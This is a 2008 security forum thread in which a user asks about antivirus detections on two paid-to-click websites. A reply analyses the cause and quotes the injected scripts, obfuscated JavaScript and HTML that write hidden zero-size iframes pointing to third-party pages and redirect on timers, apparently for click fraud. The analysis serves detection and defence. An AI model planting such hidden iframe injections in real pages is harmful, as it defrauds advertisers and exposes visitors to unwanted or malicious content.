CastleCops® Malware detected by AntiVir, not others?

Need help? Click here to register for free! Absolutely zero advertisements on this site!

	Donation/Premium

	Donations. Become Premium Today!

	Security Central

	· Home · PIRT/Fried Phish · MIRT · SIRT · Deutsch · Wiki · Newsletter · O16/ActiveX · CLSID List · Contest2007 · Downloads · Feedback (send) · Forums · HijackThis · Hijacktrend · LSPs · My Downloads · O18 · O20 · O21 · O22 · O23 · O9 · Premium · Private Messages · Proxomitron · Reviews · Search · StartupList · Stories Archive · Submit News · WsIRT · Your Account · Acceptable Use Policy

Forum FAQ

Usergroups

Profile

Select FavForums

Malware detected by AntiVir, not others?

All -> FavForums -> Web Malware Links

[del.icio.us!] [digg it!] [reddit!]

View previous topic :: View next topic

Author

Message

vk3ukf

Cadet
Cadet

Joined: Dec 11, 2004
Posts: 4
Location: Australia

Posted: Thu Jun 05, 2008 10:27 pm Post subject: Malware detected by AntiVir, not others?

Helo, I have been wandering around the PTC sites and found two recently that hammered me, every time. I am using AntiVir, and it caught a pile of bad guys, I posted on a couple of the PTC forums about the sites, and a few reported that they were using Avast and AVG and that nothing had been reported to them or detected when they visited the sites. OK, here are details of what happened. I opened the buxtc website. Again the virus warnings straight away. d3[1].htm contains the detection pattern of the HTML script virus HTML/Infected.Webpage.Gen I quarantine it, straight away another warning. c2[1].htm contains the detection pattern of the HTML script virus HTML/IFrame.Age.tih. I quarantine it and straight away another warning. t[1].htm contains the detection pattern of the HTML script virus HTML/Infected.Webpage.Gen I quarantine it and straight away another warning. portal[1].htm contains the detection pattern of the HTML script virus HTML/IFrame.13197 I quarantine it and straight away another warning. anticheat[1].htm contains the detection pattern of the HTML script virus HTML/Infected.Webpage.Gen I quarantine it and straight away another warning. anticheat[2].htm contains the detection pattern of the HTML script virus HTML/Infected.Webpage.Gen I quarantine it and straight away another warning. index[9].htm contains the detection pattern of the HTML script virus HTML/Infected.Webpage.Gen I quarantine it and straight away another warning. click[1].htm contains the detection pattern of the HTML script virus HTML/Infected.Webpage.Gen I quarantine it and straight away another warning. Internet Explorer cannot open the Internet site hxxp://buxtc.com/ There is an OK button, I click it. I am then forwarded to xxx.homeatyellow.com.au. The two sites are buxtc and buxear. My questions are, Is this AntiVir catch a valid detection of Malware. and, if it is a valid detection, Why aren't the other softwares mentioned catching them?

tetak

MIRT Team Lead
Premium Member

Joined: Jan 19, 2007
Posts: 5869

Posted: Fri Jun 06, 2008 6:17 pm Post subject:

I checked

Code:

http://buxtc.com/

but I couldn't see any malware. It may have been removed.

_________________
Got Windows XP? Help protect your PC from malware with Microsofts anti-spyware program Windows Defender.

Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx

cconniejean

Trooper
Trooper

Joined: Jan 16, 2008
Posts: 17
Location: USA

Posted: Sat Jun 07, 2008 3:08 am Post subject:

I think a lot of that comes from the pay-ads.com script. I have seen that on many of the bux type site. A form of cheating, click fraud. Pay-ads is know for this.

Code:

http://buxtc.com/ looking at their view source:
<script>ads_id="lolasrojas";b=window.document;b.write('<iframe src="http://www.pay-ads.com/ads.php?usr='+ads_id+'" width=480"'+'" height=60"'+'" frameborder="0" scrolling="no">Your browser does not support IFRAME</iframe>');</script></p>

Looking at this one:

Code:

http://www.pay-ads.com/abc.js
Headers:
Date: Sat, 07 Jun 2008 01:54:00 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Wed, 21 May 2008 23:36:28 GMT
ETag: "7600f2-46b-10d37700"
Accept-Ranges: bytes
Content-Length: 1131
Connection: close
Content-Type: application/x-javascript

function jsmake(secs,surl){
if(--secs>0){
setTimeout("jsmake("+secs+",'"+surl+"')",1000);
}
else{
asbc.location.href=surl;
ccss.location.href=surl;
}
}
if (navigator.appName == 'Netscape')
var language = navigator.language;
else
var language = navigator.browserLanguage;

if (language.indexOf('zh') == -1)
{

temp_frame1='iframe' + ' name="bbcc"' + ' src="http://gobesthyip.com/ms.htm"' + ' width=0 height=0 m
arginwidth="0" marginheight="0" frameborder=0 scrolling="no" ';
temp_frame2='iframe' + ' name="asbc"' + ' src="http://gobesthyip.com/c2.htm"' + ' width=0 height=0 m
arginwidth="0" marginheight="0" frameborder=0 scrolling="no" ';
temp_frame3='iframe' + ' name="ccss"' + ' src="http://gobesthyip.com/d3.htm"' + ' width=0 height=0 m
arginwidth="0" marginheight="0" frameborder=0 scrolling="no" ';
document.write('<' + temp_frame3 + '>');
document.write('</ifr' + 'ame>');
document.write('<' + temp_frame1 + '>');
document.write('</ifr' + 'ame>');
document.write('<' + temp_frame2 + '>');
document.write('</ifr' + 'ame>');
jsmake(45,'http://www.google.com/s.htm');
}

Code:

http://gobesthyip.com/ms.htm

<iframe width=0 height=0 frameborder=0 name="cbsearch" src='http://cb-search.com/cpi.
php' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<iframe width=0 height=0 frameborder=0 name="finds" src='http://finds123.com/cpi.php'
marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<iframe width=0 height=0 frameborder=0 name="123" src='http://searchx123.com/cpi.php'
marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<script>
var keyword1 = new Array("", "", "http://nbcsearch.us/cpi.php");
var rand1 = Math.floor(Math.random() * 3);

temp_frame1='iframe' + ' name="BAG"' + ' src="' + keyword1[rand1] + '"' + ' width=0 height=0 marginw
idth="0" marginheight="0" frameborder=0 scrolling="no" ';

document.write('<' + temp_frame1 + '>');
document.write('</ifr' + 'ame>');
document.write(keyword1[rand1]);
</script>

<iframe width=0 height=0 frameborder=0 name="b9" src='' marginwidth=0 marginheight=0
vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<iframe width=0 height=0 frameborder=0 name="bb8" src='' marginwidth=0 marginheight=0
vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<script>
function jsmake(secs,surl){
if(--secs>0){
setTimeout("jsmake("+secs+",'"+surl+"')",1000);
}
else{
b9.location.href=surl;
}
}

function jsks(secs,surl){
if(--secs>0){
setTimeout("jsks("+secs+",'"+surl+"')",1000);
}
else{
bb8.location.href=surl;
}
}

jsmake(3,'http://gobesthyip.com/9.htm');
jsmake(32,'http://www.google.com/s.htm');
</script>

Code:

http://gobesthyip.com/c2.htm

<html>
<br>
<iframe width=0 height=0 frameborder=0 src='http://nbcsearch.us/ak.htm' marginwidth=0 marginhei
ght=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<iframe src="http://now-search.com/cpi.php" width="1" height="1"
frameborder="0"></iframe>
<iframe src="http://gogoppc.com/cpi.php" width="1" height="1" frameborder="0"></iframe>
<iframe width=0 height=0 frameborder=0 src='http://www.feedwithus.com/p.php?ref=seo2007' margin
width=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<br>
<iframe width=0 height=0 frameborder=0 src='http://www.adtris.com/portal.php?ref=seo2007' margi
nwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<br>

Code:

http://gobesthyip.com/d3.htm

<html>
<head>
<title>PTP page</title>
</head>
<iframe src="http://www.luxemil.com/search/portal.php?username=isearch8" width=0 height=0 frameborder=0 scrolling=no></iframe>
<iframe src="http://www.upperhits.com/index.php?id=lux3389" width="0" height="0"></iframe>
<iframe src="http://neoffic.com/t/?id=seoppc" width="480" height="60" frameborder="0" scrolling="no">Your browser does not support IFRAME</iframe>
</html>

Buxear.com has their pay-ads running here:

Code:

Code:

http://www.buxear.com/css/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Documento sin título</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<script>ads_id="lolasrojas";b=window.document;b.write('<i
frame src="http://www.pay-ads.com/ads.php?usr='+ads_id+'" width=480"'+'" height=60"'+'" frameborder="0" scrolling="no">Your browser does not support IFRAME</iframe>');</script>
<body>
</body>
</html>

	All -> FavForums -> Web Malware Links	All times are GMT
Page 1 of 1

You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You cannot download files in this forum


	2002-2008 � Computer Cops LLC dba CastleCops®. All rights reserved. Acceptable Use Policy. Use signifies your agreement. 193ppm 0.753s (0.058s) Making cybercriminals unhappy since 2002*